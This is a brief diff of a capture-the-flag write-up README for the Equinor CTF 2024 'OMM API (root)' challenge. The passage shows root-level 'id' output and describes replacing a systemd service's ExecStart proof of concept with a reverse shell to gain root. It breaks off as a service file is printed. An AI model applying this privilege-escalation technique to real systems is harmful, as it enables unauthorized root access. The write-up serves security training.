spydx/equinor-ctf-2024/writeups/realworld/OMM API (root)/53-kilo-med-data/README.md

 uid=0(root) gid=1003(f_omm_app) groups=1003(f_omm_app)
 ```

-With this knowledge, we can swap out the `ExecStart` POC with a reverse shell to get root, and the flag!
+As we can see, the service runs as `root` now.
+With this knowledge, we can swap out the `ExecStart` POC with a reverse shell to become root, and then get the flag!
 ```
 f_omm_app@ip-10-128-3-164:/dev/shm$ cat ip-10-128-3-164/test.service
 [Service]